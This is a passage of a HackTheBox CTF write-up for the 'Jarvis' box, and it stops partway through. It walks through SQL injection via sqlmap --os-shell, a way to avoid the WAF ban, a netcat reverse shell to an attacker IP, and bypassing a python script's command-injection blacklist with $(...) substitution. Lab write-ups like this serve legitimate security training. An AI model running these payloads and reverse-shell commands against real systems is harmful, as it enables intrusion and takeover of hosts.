<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Jarvis was a pretty straight forward box and “textbook case” style. While it’s rated as Medium difficulty I would advise beginners to start with this one. It rely on bad configurations practices rat">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Jarvis">
<meta property="og:url" content="https://hg8.sh/posts/jarvis/index.html">
<meta property="og:site_name" content="hg8&#39;s Notes — My notes about infosec world. Pentest&#x2F;Bug Bounty&#x2F;CTF Writeups.">
<meta property="og:description" content="Jarvis was a pretty straight forward box and “textbook case” style. While it’s rated as Medium difficulty I would advise beginners to start with this one. It rely on bad configurations practices rat">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/82158090-f4010000-9885-11ea-8bb6-383fd343d13c.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/66945555-8cfd3d80-f04f-11e9-9481-4cdf99eadcfa.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/66947239-d56a2a80-f052-11e9-9af5-ff160024847f.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/66947449-3691fe00-f053-11e9-8be6-0a53d6269fc0.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/67007518-e0bb6580-f0e7-11e9-9b1b-f01b364b2926.png">
<meta property="article:published_time" content="2019-11-08T23:00:00.000Z">
<meta property="article:modified_time" content="2020-05-18T13:17:08.337Z">
<meta property="article:author" content="hg8">
<meta property="article:tag" content="python">
<meta property="article:tag" content="gtfobins">
<meta property="article:tag" content="gobuster">
<meta property="article:tag" content="jarvis">
<meta property="article:tag" content="waf">
<meta property="article:tag" content="sql-injection">
<meta property="article:tag" content="sqlmap">
<meta property="article:tag" content="phpmyadmin">
<meta property="article:tag" content="cve-2018-12613">
<meta property="article:tag" content="systemctl">
<meta property="article:tag" content="service">
<meta property="article:tag" content="command-injection">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://user-images.githubusercontent.com/9076747/82158090-f4010000-9885-11ea-8bb6-383fd343d13c.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
     
    <title>HackTheBox - Jarvis :: hg8&#39;s Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups." type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/networked/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/haystack/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
    </span>
    <br/>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Injection"><span class="toc-number">1.2.</span> <span class="toc-text">SQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-www-data-gt-pepper"><span class="toc-number">1.3.</span> <span class="toc-text">Pivot www-data -&gt; pepper</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Systemctl-privilege-escalation"><span class="toc-number">2.2.</span> <span class="toc-text">Systemctl privilege escalation</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        <header id="header">
  <a href="/">
  
      <div id="logo" style="background-image: url(/images/logo.webp);"></div>
  
    <span class="logo__mark"></span>
    <span class="logo__text">./hg8.sh</span>
    <span class="logo__cursor"></span>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#"><i class="fas fa-bars fa-2x"></i></a>
      </li>
       
        <li><a href="/">Home</a></li>
       
        <li><a href="/about/">About</a></li>
       
        <li><a href="/archives/">Posts</a></li>
       
        <li><a href="/search/">Search</a></li>
      
    </ul>
  </div>
</header>

        
          <br>
          <br>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Jarvis
    </h1>



    <div class="meta"> 
      
    <div class="postdate">
      
        <time datetime="2019-11-08T23:00:00.000Z" itemprop="datePublished">09-11-2019</time>
        
      
    </div>


      — Written by 
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hg8</span>
      </span>
      —
      10 min read
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <img width="582" alt="jarvis-hackthebox" src="https://user-images.githubusercontent.com/9076747/82158090-f4010000-9885-11ea-8bb6-383fd343d13c.png">

<p>Jarvis was a pretty straight forward box and “textbook case” style. While it’s rated as Medium difficulty I would advise beginners to start with this one.</p>
<p>It rely on bad configurations practices rather than already made exploits which makes it more interesting in my opinion.</p>
<p>First thing first, let’s add the box IP to the hosts file:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">"10.10.10.143 jarvis.htb"</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>Let’s go !</p>
<h2 id="User-Flag"><a href="#User-Flag" class="headerlink" title="User Flag"></a>User Flag</h2><h3 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h3><p>Let’s start with the classic <code>nmap</code> scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nmap -sV -sT -sC jarvis.htb</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 19:16 CEST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> jarvis.htb (10.10.10.143)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.25 ((Debian))</span><br><span class="line">|_http-server-header: Apache/2.4.25 (Debian)</span><br><span class="line">|_http-title: Stark Hotel</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>

<p>Seems like we have somethig super classic: A http (port 80) and SSH (port 22) service open.</p>
<p>Opening the <code>http://jarvis.htb</code> display the following website :</p>
<p><img src="https://user-images.githubusercontent.com/9076747/66945555-8cfd3d80-f04f-11e9-9481-4cdf99eadcfa.png" alt="Jarvis website"></p>
<p>Browsing the site shows available rooms, food and… that’s it. The only page that looks dynamic is the room description page:<br>Let’s keep that in mind.</p>
<p>Out of curiosity I ran <code>gobuster</code> to see if we can find interresting files and directories but nothing special was found :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ gobuster dir -u http://jarvis.htb -w ~/SecLists/Discovery/Web-Content/common.txt</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.0.1</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)</span><br><span class="line">===============================================================</span><br><span class="line">/.htaccess (Status: 403)</span><br><span class="line">/.htpasswd (Status: 403)</span><br><span class="line">/.hta (Status: 403)</span><br><span class="line">/css (Status: 301)</span><br><span class="line">/fonts (Status: 301)</span><br><span class="line">/images (Status: 301)</span><br><span class="line">/index.html (Status: 200)</span><br><span class="line">/index.php (Status: 200)</span><br><span class="line">/js (Status: 301)</span><br><span class="line">/phpmyadmin (Status: 301)</span><br></pre></td></tr></table></figure>

<p>Maybe the <code>phpmyadmin</code> instance will come useful in the future.</p>
<p>Oddly enough I could run <code>gobuster</code> without issue while during my first walkthrough I got banned when using any automated scanner and got the following message :</p>
<blockquote>
<p>Hey you have been banned for 90 seconds, don’t be bad</p>
</blockquote>
<h3 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h3><p>Since we have no other interesting entry point so far let’s focus on that room page.</p>
<p>Looking the url <code>http://jarvis.htb/room.php?cod=1</code>, we immediatly notice the <code>cod=1</code> parameter. Let’s try some injection here, starting with the most common: SQL Injection.</p>
<p>Appending various characters to the <code>cod</code> parameters yield an empty room description :</p>
<p><img src="https://user-images.githubusercontent.com/9076747/66947239-d56a2a80-f052-11e9-9af5-ff160024847f.png" alt="Jarvis website cod parameter"></p>
<p>After a few tries we discover that the classical <code>AND 1=1</code> payload works.</p>
<p>Opening <code>http://jarvis.htb/room.php?cod=1</code> and <code>http://jarvis.htb/room.php?cod=1 AND 1=1</code> return the exact same result :</p>
<p><img src="https://user-images.githubusercontent.com/9076747/66947449-3691fe00-f053-11e9-8be6-0a53d6269fc0.png" alt="Jarvis website cod parameter injection"></p>
<p>Let’s automate the process with our favorite SQL injection toolkit: <a href="http://sqlmap.org" target="_blank" rel="noopener">SQLMap</a>.</p>
<p>A very useful option (in our case) is <code>--os-shell</code>, with it SQLMap will if possible use the SQL injection to upload and open a reverse shell to the server.</p>
<p>Let’s let SQLMap do all the dirty work for us:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">"http://jarvis.htb/room.php?cod=6"</span> --os-shell</span><br><span class="line">        ___</span><br><span class="line">       __H__</span><br><span class="line"> ___ ___[<span class="string">"]_____ ___ ___  &#123;1.3.10#stable&#125;</span></span><br><span class="line"><span class="string">|_ -| . [.]     | .'| . |</span></span><br><span class="line"><span class="string">|___|_  [']_|_|_|__,|  _|</span></span><br><span class="line"><span class="string">      |_|V...       |_|   http://sqlmap.org</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[...]</span></span><br><span class="line"><span class="string">[10:56:40] [CRITICAL] page not found (404)</span></span><br><span class="line"><span class="string">[10:56:40] [WARNING] HTTP error codes detected during run:</span></span><br><span class="line"><span class="string">404 (Not Found) - 2 times</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[*] ending @ 10:56:40 /2019-10-17/</span></span><br></pre></td></tr></table></figure>

<p>No surprise, we get banned here with the same error message :</p>
<blockquote>
<p>Hey you have been banned for 90 seconds, don’t be bad.</p>
</blockquote>
<p>Let’s try different options. First adding a delay of 10 seconds between each request (with <code>--delay=10</code>) might not trigger the ban:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ sqlmap -u <span class="string">"http://jarvis.htb/room.php?cod=6"</span> --delay=10 --os-shell</span><br><span class="line">        ___</span><br><span class="line">       __H__</span><br><span class="line"> ___ ___[)]_____ ___ ___  &#123;1.3.10<span class="comment">#stable&#125;</span></span><br><span class="line">|_ -| . [<span class="string">"]     | .'| . |</span></span><br><span class="line"><span class="string">|___|_  [,]_|_|_|__,|  _|</span></span><br><span class="line"><span class="string">      |_|V...       |_|   http://sqlmap.org</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[...]</span></span><br><span class="line"><span class="string">[20:02:08] [INFO] heuristic (basic) test shows that GET parameter 'cod' might be injectable</span></span><br><span class="line"><span class="string">[20:02:09] [INFO] GET parameter 'cod' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="</span>high<span class="string">")</span></span><br><span class="line"><span class="string">[20:02:10] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'</span></span><br><span class="line"><span class="string">[...]</span></span><br><span class="line"><span class="string">[20:02:35] [INFO] GET parameter 'cod' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)' injectable</span></span><br><span class="line"><span class="string">[20:02:37] [INFO] GET parameter 'cod' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable</span></span><br><span class="line"><span class="string">sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:</span></span><br><span class="line"><span class="string">---</span></span><br><span class="line"><span class="string">Parameter: cod (GET)</span></span><br><span class="line"><span class="string">    Type: boolean-based blind</span></span><br><span class="line"><span class="string">    Title: AND boolean-based blind - WHERE or HAVING clause</span></span><br><span class="line"><span class="string">    Payload: cod=6 AND 2304=2304</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: time-based blind</span></span><br><span class="line"><span class="string">    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</span></span><br><span class="line"><span class="string">    Payload: cod=6 AND (SELECT 4682 FROM (SELECT(SLEEP(5)))PeAe)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: UNION query</span></span><br><span class="line"><span class="string">    Title: Generic UNION query (NULL) - 7 columns</span></span><br><span class="line"><span class="string">    Payload: cod=-3361 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7071,0x4d496842456c564972414349534c7467674866537166477a644d4f456341536d6453775166635779,0x716b626a71),NULL,NULL,NULL-- VXEr</span></span><br><span class="line"><span class="string">---</span></span><br><span class="line"><span class="string">[20:02:40] [INFO] the back-end DBMS is MySQL</span></span><br><span class="line"><span class="string">back-end DBMS: MySQL &gt;= 5.0.12</span></span><br><span class="line"><span class="string">[20:02:40] [INFO] going to use a web backdoor for command prompt</span></span><br><span class="line"><span class="string">[20:02:40] [INFO] fingerprinting the back-end DBMS operating system</span></span><br><span class="line"><span class="string">[20:02:40] [INFO] the back-end DBMS operating system is Linux</span></span><br><span class="line"><span class="string">[...]</span></span><br><span class="line"><span class="string">[20:02:41] [WARNING] unable to automatically retrieve the web server document root</span></span><br><span class="line"><span class="string">what do you want to use for writable directory?</span></span><br><span class="line"><span class="string">[...]</span></span><br><span class="line"><span class="string">[20:02:44] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method</span></span><br><span class="line"><span class="string">[20:02:45] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpuhbex.php</span></span><br><span class="line"><span class="string">[20:02:45] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpbmblq.php</span></span><br><span class="line"><span class="string">[20:02:45] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER</span></span><br><span class="line"><span class="string">os-shell&gt; id</span></span><br><span class="line"><span class="string">command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'</span></span><br></pre></td></tr></table></figure>

<p>Jackpot!</p>
<p><em>Note: We could also have used <code>--user-agent=&lt;random-ua&gt;</code> to avoid using the default <code>sqlmap</code> user agent that can get easily detected by WAF.</em></p>
<p>We have a PHP shell running as www-data.<br>For ease of use, I open a netcat reverse shell and close the php shell opened by SQLMap:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="comment"># Back to the SQLMap/PHP reverse shell</span></span><br><span class="line">os-shell&gt; nc -e /bin/sh 10.10.10.10 8585</span><br></pre></td></tr></table></figure>

<p>And surely we get the connection:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br><span class="line">Connection from 10.10.10.143:54336</span><br><span class="line">id</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br></pre></td></tr></table></figure>

<p>Note: As a reminder you can use the following magic trick to upgrade your shell to a fully interactive one :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># In reverse shell</span></span><br><span class="line">$ python -c <span class="string">'import pty; pty.spawn("/bin/bash")'</span></span><br><span class="line">Ctrl-Z</span><br><span class="line"></span><br><span class="line">[hg8@archbook ~]$ <span class="comment"># In Attacker console</span></span><br><span class="line">[hg8@archbook ~]$ stty raw -<span class="built_in">echo</span></span><br><span class="line">[hg8@archbook ~]$ <span class="built_in">fg</span></span><br><span class="line"></span><br><span class="line">$ <span class="comment"># In reverse shell</span></span><br><span class="line">$ reset</span><br><span class="line">$ <span class="built_in">export</span> SHELL=bash</span><br><span class="line">$ <span class="built_in">export</span> TERM=xterm-256color</span><br><span class="line">$ stty rows &lt;num&gt; columns &lt;cols&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Pivot-www-data-gt-pepper"><a href="#Pivot-www-data-gt-pepper" class="headerlink" title="Pivot www-data -&gt; pepper"></a>Pivot www-data -&gt; pepper</h3><p>Alright, so now we have shell on the <code>www-data</code> user. Let’s try to move to the user to find the first flag.</p>
<p>Looking around the webapp files we find the database credentials:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">www-data@jarvis:/var/www/html$ cat connection.php</span><br><span class="line">&lt;?php</span><br><span class="line"><span class="variable">$connection</span>=new mysqli(<span class="string">'127.0.0.1'</span>,<span class="string">'DBadmin'</span>,<span class="string">'imissyou'</span>,<span class="string">'hotel'</span>);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>We can try to connect using the <code>phpmyadmin</code> instance:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/67007518-e0bb6580-f0e7-11e9-9b1b-f01b364b2926.png" alt="Jarvis phpmyadmin instance"></p>
<p>But turn out there is nothing interesting there. Only a empty <code>flag</code> database, probably a joke by one of the users. Let’s move on.</p>
<p>To make the recon task easier, we are going to use the <a href="https://github.com/diego-treitos/linux-smart-enumeration" target="_blank" rel="noopener">Linux enumeration tool</a>. For the transfer of the script we will setup a simple http server on our attacking machine:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ wget <span class="string">"https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh"</span> -O lse.sh</span><br><span class="line">[hg8@archbook ~]$ python -m http.server</span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br><span class="line"></span><br><span class="line">$ wget 10.10.10.10:8000/lse.sh -O /tmp/lse.sh</span><br><span class="line">2019-10-17 08:00:49 (527 KB/s) - <span class="string">'/tmp/lse.sh'</span> saved [31736/31736]</span><br></pre></td></tr></table></figure>

<p>Let’s run the script to see if we can find anything intesrresting :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ bash /tmp/lse.sh</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line">===================================================================( sudo )=====</span><br><span class="line">[!] sud000 Can we sudo without a password?................................. nope</span><br><span class="line">[!] sud010 Can we list sudo commands without a password?................... yes!</span><br><span class="line">---</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> www-data on jarvis:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/<span class="built_in">local</span>/sbin\:/usr/<span class="built_in">local</span>/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User www-data may run the following commands on jarvis:</span><br><span class="line">    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py</span><br><span class="line">---</span><br><span class="line">============================================================( file system )=====</span><br><span class="line">[!] fst020 Uncommon setuid binaries........................................ yes!</span><br><span class="line">---</span><br><span class="line">/bin/systemctl</span><br><span class="line">---</span><br><span class="line">==================================( FINISHED )==================================</span><br></pre></td></tr></table></figure>

<p>We notice two very distinctive configurations here. First of all, the script <code>/var/www/Admin-Utilities/simpler.py</code> can be run as user <code>pepper</code> without password through sudo. This <code>simpler.py</code> script will be our entry point to pivot to the <code>pepper</code> user.</p>
<p>Second, we notice that <code>systemctl</code> binary at the setuid bit set. As a reminder SETUID is special permission attributes in Unix and Unix-like systems, they allow unprivileged users to run programs with elevated privileges.</p>
<p>Here <code>systemctl</code> will always be run at root:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ls -l /bin/systemctl</span><br><span class="line">-rwsr-x--- 1 root pepper 174520 Feb 17  2019 /bin/systemctl</span><br></pre></td></tr></table></figure>

<p>Let’s keep that in mind for the privilege escalation later.</p>
<p>Alright, with all of that in mind, let’s investigate this <code>simpler.py</code> script to see how we can abuse it to pivot to the <code>pepper</code> user.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ ls -l</span><br><span class="line">total 8</span><br><span class="line">-rwxr--r-- 1 pepper pepper 4587 Mar  4  2019 simpler.py</span><br></pre></td></tr></table></figure>

<p>The file is owned by <code>pepper</code> user and we have no right to edit it. We will need to find a vulnerabiility in the script.</p>
<p>Upon opening it we can see it’s used to show statistics about attackers IP and to ping those IP.</p>
<p>The function to <code>ping</code> catch the attention because of the use of <code>os.system</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exec_ping</span><span class="params">()</span>:</span></span><br><span class="line">    forbidden = [<span class="string">'&amp;'</span>, <span class="string">';'</span>, <span class="string">'-'</span>, <span class="string">'`'</span>, <span class="string">'||'</span>, <span class="string">'|'</span>]</span><br><span class="line">    command = input(<span class="string">'Enter an IP: '</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> forbidden:</span><br><span class="line">        <span class="keyword">if</span> i <span class="keyword">in</span> command:</span><br><span class="line">            print(<span class="string">'Got you'</span>)</span><br><span class="line">            exit()</span><br><span class="line">    os.system(<span class="string">'ping '</span> + command)</span><br></pre></td></tr></table></figure>

<p><code>os.system(&#39;ping &#39; + command)</code> clearly open a command injection vulnerability. However the script author seems to be aware of the issue and blacklisted a few common characters used in command injection.</p>
<p>So we can’t easily inject command. But then what about command substitution ?</p>
<p>According to the bash manual:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ man bash</span><br><span class="line">[...]</span><br><span class="line">Command Substitution</span><br><span class="line">       Command substitution allows the output of a <span class="built_in">command</span> to replace the <span class="built_in">command</span> name.  There are two forms:</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">              $(<span class="built_in">command</span>)</span><br><span class="line">       or</span><br><span class="line">              `<span class="built_in">command</span>`</span><br></pre></td></tr></table></figure>

<p> While the <code>`</code> is blacklisted, neither <code>$</code> or <code>()</code> is. Let’s try to subsitate then :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> ***********************************************</span><br><span class="line">     _                 _</span><br><span class="line"> ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _</span><br><span class="line">/ __| | <span class="string">'_ ` _ \| '</span>_ \| |/ _ \ <span class="string">'__| '</span>_ \| | | |</span><br><span class="line">\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |</span><br><span class="line">|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |</span><br><span class="line">                |_|               |_|    |___/</span><br><span class="line">                                @ironhackers.es</span><br><span class="line"></span><br><span class="line">***********************************************</span><br><span class="line"></span><br><span class="line">Enter an IP: $(id)</span><br><span class="line">ping: groups=1000(pepper): Temporary failure <span class="keyword">in</span> name resolution</span><br></pre></td></tr></table></figure>

<p> Awseome, let’s use this to open a reverse shell:</p>
